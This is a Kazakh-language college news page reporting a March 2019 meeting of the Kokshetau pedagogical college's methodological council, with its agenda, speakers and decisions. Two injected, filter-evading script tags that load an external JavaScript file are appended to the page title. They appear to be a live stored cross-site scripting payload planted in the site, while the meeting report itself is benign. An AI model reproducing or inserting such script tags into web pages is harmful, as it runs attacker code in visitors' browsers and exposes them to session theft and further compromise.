Ғылыми-әдістемелік және кәсібилендіру кеңесі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.03.2019

 

    Ағымдағы жылдың 15 наурыз күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде ғылыми-әдістемелік және кәсібилендіру кеңесі өтті. Отырсқа колледж әкімшілігі, бөлім меңгерушілері, дәрісхана меңгерушілері қатысты.

Күн тәртібінде:

1. Оқу дәрісханаларын (108, 109, 211) заманауи тұрғыда жаңарту жұмыстарын жоспарлау.

                                                                                        Дәрісхана меңгерушілері

2. Оқу дәрісханаларындағы техникалық құралдар мен электронды дидактиканың сапасын жақсарту жолдары: келесі оқу жылына қажетті жабдықтарды анықтау.

                                                                                        Қ.Шәкіржанов

3. Жаңадан жазылған оқу құралдарының мазмұнын талқылау, ұсыныстар мен пікірлер.

                                                                                        А.Бейсембина

4. Колледжде берілетін қосымша біліктіліктердің оқу-әдістемелік кешендерін тексеру нәтижелерінің қорытындысы, келесі оқу жылына перспективалық жобалауды іске асыру.

                                                                                       Т.Сәбитова, А.Бейсембина

5. Бөлім меңгерушілері тарапынан берілген ұсыныстарды талқылау.

                                                                                        Н.Ахат

   Ғылыми-әдістемелік және кәсібилендіру кеңесінің күн тәртібіне қойылған мәселелер отырыс барысында жан-жақты қарасытырылып, талқыланды. Дәрісхана меңгерушілері тарапынан көрсетілген әрбір дәрісхананың ішкі мазмұнын жаңа заманауи мазмұнда өзгертуге байланысты ұсыныстар жасалып, көрсетілді. Жазылған оқу құралдары мен оқу-әдістемелік құралдарының жақсы, ұтымды жақтары мен кемшім тұстары көрсетіліп талқыланды. Толықтыруды қажет ететін оқу құралдарын жетілдіруге уақыт берілді. Колледжде берілетін қосымша біліктер бойынша оқу-әдістемелік кешендері толықтырылып, көрмеге қойылатын материалдары әзірленсін деген ұсыныс жасалды. Бөлім меңгерушілері тарапынан берілген ұсыныстар талқыланып, қаулыға енгізілді. 

Просмотров: 607


Пікір қосу



Деректерді қолтаңбаға қосу